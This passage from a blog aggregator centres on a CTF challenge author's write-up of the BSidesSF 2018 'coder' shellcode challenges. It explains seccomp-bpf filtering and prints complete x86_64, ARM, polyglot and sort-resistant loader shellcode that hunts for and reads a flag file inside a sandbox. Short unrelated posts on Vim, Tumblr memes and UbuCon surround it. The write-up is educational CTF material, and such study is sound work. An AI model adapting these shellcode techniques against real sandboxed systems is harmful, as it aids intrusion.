I would like everyone to try Vi's modal editing. It will change your life, I assure you, despite requiring a bit of time in the beginning. If you ever get stuck, just Google your problem and I'm 150% positive you will find an answer. As time goes by, I'm positive you will discover features of Vim you didn't even know were possible.

Thanks for reading.

gsilvapt

22 Apr 2018 12:00am GMT

21 Apr 2018

Benjamin Mako Hill: Mako Hate

I recently discovered a prolific and sustained community of meme-makers on Tumblr dedicated to expressing their strong dislike for "Mako."

Two tags with examples are #mako hate and #anti mako but there are many others.

I've also discovered Tumblrs entirely dedicated to the topic!

For example, Let's Roast Mako describes itself as "A place to beat up Mako. In peace. It's an inspiration to everyone!"

The second is the Fuck Mako Blog, which describes itself with a series of tag-lines including "Mako can fuck right off and we're really not sorry about that," "Welcome aboard the SS Fuck-Mako," and "Because Mako is unnecessary." Sub-pages of the site include:

I'll admit I'm a little disquieted.

21 Apr 2018 9:31pm GMT

David Tomaschik: BSidesSF CTF 2018: Coder Series (Author's PoV)

Introduction

As the author of the "coder" series of challenges (Intel Coder, ARM Coder, Poly Coder, and OCD Coder) in the recent BSidesSF CTF, I wanted to share my perspective on the challenges. I can't tell if the challenges were uninteresting, too hard, or both, but they were solved by far fewer teams than I had expected. (And than we had rated the challenges for when scoring them.)

The entire series of challenges were based on the premise "give me your shellcode and I'll run it", but with some limitations. Rather than forcing players to find and exploit a vulnerability, we wanted to teach players about dealing with restricted environments like sandboxes, unusual architectures, and situations where your shellcode might be manipulated by the process before it runs.

Overview

Each challenge requested the length of your shellcode followed by the shellcode and allowed for ~1k of shellcode (which is more than enough for any reasonable exploitation effort on these). Shellcode was placed into newly-allocated memory with RWX permissions, with a guard page above and below. A new stack was allocated similarly, but without the execute bit set.
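
To make that concrete, submitting an exploit boiled down to a tiny client along these lines. This is just a sketch in Rust; the host, port, and exact framing here are assumptions for illustration, not the real challenge endpoint:

use std::io::{Read, Write};
use std::net::TcpStream;

fn main() -> std::io::Result<()> {
    // Hypothetical endpoint; the real CTF services are long gone.
    let mut conn = TcpStream::connect("coder.example.org:1337")?;
    let shellcode = std::fs::read("shellcode.bin")?;

    // Send the length first, then the raw shellcode bytes.
    conn.write_all(format!("{}\n", shellcode.len()).as_bytes())?;
    conn.write_all(&shellcode)?;

    // Whatever the shellcode writes (hopefully the flag) comes back
    // over the socket.
    let mut output = String::new();
    conn.read_to_string(&mut output)?;
    print!("{}", output);
    Ok(())
}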

Each challenge got a seccomp-bpf sandbox setup, with slight variations in the limitations of the sandbox to encourage players to look into how the sandbox is created:

The shellcode was then executed by a helper function written in assembly. (To swap the stack then execute the shellcode.)

There were a few things that made these challenges harder than they might have otherwise been:

A Seccomp Primer

Seccomp initially was a single system call that limited the calling thread to use a small subset of syscalls. seccomp-bpf extended this to use Berkeley Packet Filters (BPF) to allow for filtering system calls. The system call number and arguments (from registers) are placed into a structure, and the BPF is used to filter this structure. The filter can result in allowing or denying the syscall, and on a denied syscall, an error may be returned, a signal may be delivered to the calling thread, or the thread may be killed.

Because all of the registers are included in the structure, seccomp-bpf allows for filtering not only on the system call itself, but also on the arguments passed to the system call. One quirk of this is that it is completely unaware of the types of the arguments, and only operates on the contents of the registers used for passing arguments. Consequently, pointer arguments are compared by the pointer value and not by the contents pointed to. I actually hadn't thought about this before writing this challenge and limiting the values passed to open(). All of the challenges allowing open limited it to ./flag.txt, so not only could you only open that one file, you could only do it by using the same pointer that was passed to the library functions that set up the filtering.

An interesting corollary is that if you limit system call arguments by passing in a pointer value, you probably want it to be a global, and you probably don't want it to be in writable memory, so that an attacker can't overwrite the desired string and still pass the same pointer.
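
To make the primer concrete, here is a minimal sketch of installing such a filter from Rust via the libc crate, with the classic-BPF opcodes hardcoded (they match the dump in the next section). This is illustrative only, not the challenges' actual setup code, and a real filter should also check the architecture first, as the challenge filter does:

use libc::{prctl, sock_filter, sock_fprog, PR_SET_NO_NEW_PRIVS, PR_SET_SECCOMP, SECCOMP_MODE_FILTER};

fn main() {
    const SYS_OPEN: u32 = 2; // x86_64 syscall number for open(2)
    const SECCOMP_RET_ALLOW: u32 = 0x7fff_0000;
    const SECCOMP_RET_KILL: u32 = 0x0000_0000;

    let filter = [
        // A = syscall number (offset 0 of struct seccomp_data); 0x20 = ld [k]
        sock_filter { code: 0x20, jt: 0, jf: 0, k: 0 },
        // 0x15 = jeq k: if (A == open) skip the ALLOW and fall through to KILL
        sock_filter { code: 0x15, jt: 1, jf: 0, k: SYS_OPEN },
        // 0x06 = ret k
        sock_filter { code: 0x06, jt: 0, jf: 0, k: SECCOMP_RET_ALLOW },
        sock_filter { code: 0x06, jt: 0, jf: 0, k: SECCOMP_RET_KILL },
    ];
    let prog = sock_fprog {
        len: filter.len() as u16,
        filter: filter.as_ptr() as *mut sock_filter,
    };

    unsafe {
        // Required so an unprivileged process may install a filter.
        prctl(PR_SET_NO_NEW_PRIVS, 1u64, 0u64, 0u64, 0u64);
        prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER as u64, &prog as *const sock_fprog as u64);
    }
    // From this point on, any open() kills the thread.
}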

Reverse Engineering the Sandbox

There's a wonderful toolset called seccomp-tools that provides the ability to dump the BPF structure from the process as it runs by using ptrace(). If we run the Intel coder binary under seccomp-tools, we'll see the following structure:

 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x11 0xc000003e  if (A != ARCH_X86_64) goto 0019
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x0f 0x00 0x40000000  if (A >= 0x40000000) goto 0019
 0004: 0x15 0x0d 0x00 0x00000003  if (A == close) goto 0018
 0005: 0x15 0x0c 0x00 0x0000000f  if (A == rt_sigreturn) goto 0018
 0006: 0x15 0x0b 0x00 0x00000028  if (A == sendfile) goto 0018
 0007: 0x15 0x0a 0x00 0x0000003c  if (A == exit) goto 0018
 0008: 0x15 0x09 0x00 0x000000e7  if (A == exit_group) goto 0018
 0009: 0x15 0x00 0x09 0x00000002  if (A != open) goto 0019
 0010: 0x20 0x00 0x00 0x00000014  A = args[0] >> 32
 0011: 0x15 0x00 0x07 0x00005647  if (A != 0x5647) goto 0019
 0012: 0x20 0x00 0x00 0x00000010  A = args[0]
 0013: 0x15 0x00 0x05 0x8bd01428  if (A != 0x8bd01428) goto 0019
 0014: 0x20 0x00 0x00 0x0000001c  A = args[1] >> 32
 0015: 0x15 0x00 0x03 0x00000000  if (A != 0x0) goto 0019
 0016: 0x20 0x00 0x00 0x00000018  A = args[1]
 0017: 0x15 0x00 0x01 0x00000000  if (A != 0x0) goto 0019
 0018: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0019: 0x06 0x00 0x00 0x00000000  return KILL

The first two lines check the architecture of the running binary (presumably because the system call numbers are architecture-dependent). The filter then loads the system call number to determine the behavior for each syscall. Lines 0004 through 0008 are syscalls that are allowed unconditionally. Line 0009 ensures that anything but the already-allowed syscalls or open() results in killing the process.

Lines 0010-0017 check the arguments passed to open(). Since the BPF can only compare 32 bits at a time, the 64-bit registers are split in two with shifts. The first few lines ensure that the filename string (args[0]) is a pointer with value 0x56478bd01428. Of course, due to ASLR, you'll find that this value varies with each execution of the program, so no hard coding your pointer values here! Finally, it checks that the second argument (args[1]) to open() is 0x0, which corresponds to O_RDONLY. (No opening the flag for writing!)
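
As a quick sanity check of that split, the two constants the filter compares are just the halves of the 64-bit pointer:

fn main() {
    let path_ptr: u64 = 0x5647_8bd0_1428; // the "./flag.txt" pointer in this run
    assert_eq!(path_ptr >> 32, 0x5647); // compared at line 0011
    assert_eq!(path_ptr & 0xffff_ffff, 0x8bd0_1428); // compared at line 0013
}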

seccomp-tools really makes this so much easier than manual reversing would be.

Solving Intel & ARM Coder

The solutions for both Intel Coder and ARM Coder are very similar. First, let's determine the steps we need to undertake:

  1. Locate the ./flag.txt string that was used in the seccomp-bpf filter.
  2. Open ./flag.txt.
  3. Read the file and send the contents to the player. (sendfile() on Intel, read() and write() on ARM)

In order to not be a total jerk in these challenges, I ensured that one of the registers contained a value somewhere in the .text section of the binary, to make it somewhat easier to hunt for the ./flag.txt string. (This was actually always the address of the function that executed the player shellcode.) Consequently, finding the string should have been trivial using the commonly known egghunter techniques.

At this point, it's basically just a straightforward shellcode to open() the file and send its contents. The entirety of my example solution for Intel Coder is:

BITS 64

; hunt for string based on rdx
hunt:
add rdx, 0x4
mov rax, 0x742e67616c662f2e   ; ./flag.t
cmp rax, [rdx]
jne hunt

xor rax, rax
mov rdi, rdx              ; path
xor rax, rax
mov al, 2                 ; rax for SYS_open
xor rdx, rdx              ; mode
xor rsi, rsi              ; flags
syscall

xor rdi, rdi
inc rdi                   ; out_fd
mov rsi, rax              ; in_fd from open
xor rdx, rdx              ; offset
mov r10, 0xFF             ; count
mov rax, 40               ; SYS_sendfile
syscall

xor rax, rax
mov al, 60                ; SYS_exit
xor rdi, rdi              ; code
syscall

For ARM coder, the solution is much the same, except using read() and write() instead of sendfile().

.section .text
.global shellcode
.arm

shellcode:
  # r0 = my shellcode
  # r1 = new stack
  # r2 = some pointer

  # load ./fl into r3
  MOVW r3, #0x2f2e
  MOVT r3, #0x6c66
  # load ag.t into r4
  MOVW r4, #0x6761
  MOVT r4, #0x742e
hunt:
  LDR r5, [r2, #0x4]!
  TEQ r5, r3
  BNE hunt
  LDR r5, [r2, #0x4]
  TEQ r5, r4
  BNE hunt
  # r2 should now have the address of ./flag.txt

  # SYS_open
  MOVW r7, #5
  MOV r0, r2
  MOVW r1, #0
  MOVW r2, #0
  SWI #0

  # SYS_read
  MOVW r7, #3
  MOV r1, sp
  MOV r2, #0xFF
  SWI #0

  # SYS_write
  MOVW r7, #4
  MOV r2, r0
  MOV r1, sp
  MOVW r0, #1
  SWI #0

  # SYS_exit
  MOVW r7, #1
  MOVW r0, #0
  SWI #0

Poly Coder

Poly Coder was actually not very difficult if you had solved both of the above challenges. It required only reading from an already-open FD and writing to an already-open FD. You did have to search through the FDs to find which were open, but this was easy, as any that were not would return -1, so looping until an amount greater than 0 was read/written was all that was required.

To produce shellcode that ran on both architectures, you could use an instruction that was a jump in one architecture and benign in the other. One such example is EB 7F 00 32, which is a jmp 0x7F in x86_64, but does some AND operation on r0 in ARM. Prefixing your shellcode with that, followed by up to 120 bytes of ARM shellcode, then a few bytes of padding, and the x86_64 shellcode at the end would work.
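
Laid out as a little packer, that looks like the following sketch (in Rust for readability; the padding byte is an arbitrary choice, and EB 7F jumps to offset 2 + 0x7F = 129, hence the sizes):

// Build the polyglot: 4-byte jump/AND header, the ARM payload, padding,
// then the x86_64 payload at offset 0x81 (129), the jmp target.
fn polyglot(arm: &[u8], x86_64: &[u8]) -> Vec<u8> {
    assert!(arm.len() <= 120, "ARM payload must fit before the jump target");
    let mut out = vec![0xEB, 0x7F, 0x00, 0x32]; // jmp +0x7F on x86_64, benign on ARM
    out.extend_from_slice(arm);
    out.resize(2 + 0x7F, 0x00); // pad up to the x86_64 entry point
    out.extend_from_slice(x86_64);
    out
}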

OCD Coder

As I recall it, one of the other members of our CTF organizing team joked "we should sort their shellcode before we run it." While intended as a joke, I took this as a challenge and began work to see if this was solvable. Obviously, the smaller the granularity (e.g., sorting by byte) the more difficult this becomes. I settled on trying to find a solution where it was sorted by 32-bit (DWORD) chunks, and found one with about 2 hours of effort.

Rather than try to write the entire shellcode in something that would sort correctly, I wrote a small loader that was manually tweaked to sort. This loader would then take the following shellcode and extract the lower 3 bytes of each DWORD and concatenate them. In this way, I could force ordering by inserting a one-byte tag at the most significant position of each 3 byte chunk.

It looks something like this:

[tag][3 bytes shellcode]
[tag][3 bytes shellcode]
[tag][3 bytes shellcode]

...

[3 bytes shellcode][3 by
tes shellcode][3 bytes s
hellcode]
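
In other words, the loader rebuilds the real payload by dropping the tag byte of each DWORD. Sketched in Rust (the tag sits in the most significant byte, which is the last byte of each little-endian DWORD):

// Keep the low 3 bytes of every little-endian DWORD, drop the sort tag.
fn unpack(tagged: &[u8]) -> Vec<u8> {
    tagged
        .chunks_exact(4)
        .flat_map(|dword| dword[..3].iter().copied())
        .collect()
}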

The loader is as simple as this:

BITS 32

; assumes shellcode @eax
mov ecx, 0x24
and eax, eax
add eax, ecx
mov ebx, eax
inc edx
loop:
  mov edx, [eax]
  nop
  add eax, 4
  nop
  mov [ebx], edx
  inc ebx
  inc ebx
  nop
  inc ebx
  nop
  nop
  nop
  dec ecx
  nop
  nop
  nop
  jnz loop
nop

The large number of nops was necessary to get the loader to sort properly, as were tricks like using three inc ebx instructions instead of add ebx, 3. There are even trash instructions like inc edx that have no effect on the output, but serve just to get the shellcode to sort the way I needed. The x86 opcode reference was incredibly useful in finding bytes with the desired values to make things work.

I have no doubt there are shorter or more efficient solutions, but this got the job done.

Conclusion

We'll soon be releasing the source code to all of the challenges, so you can see the details of how this was all put together, but I wanted to share my insight into the challenges from the author's point of view. Hopefully those that did solve it (or tried to solve it) had a good time doing so or learned something new.

21 Apr 2018 7:00am GMT

20 Apr 2018

Costales: UbuCon Europe 2018 | 1 Week to go!!

Yes! Everything is ready for the upcoming UbuCon Europe 2018 in Xixón! 😃

We'll have an awesome weekend of conferences (with 4 parallel talks), podcasts, stands, social events... Most of them are in English, but there will be talks in Spanish & Asturian too.

\o/

The speakers are coming from all these countries:

\o/



Are you ready for an incredible UbuCon? :)

Testing the Main Room #noedits

Remember that you have transport discounts and a main social event: the espicha.

See you in Xixón! ❤

+ info

20 Apr 2018 3:56pm GMT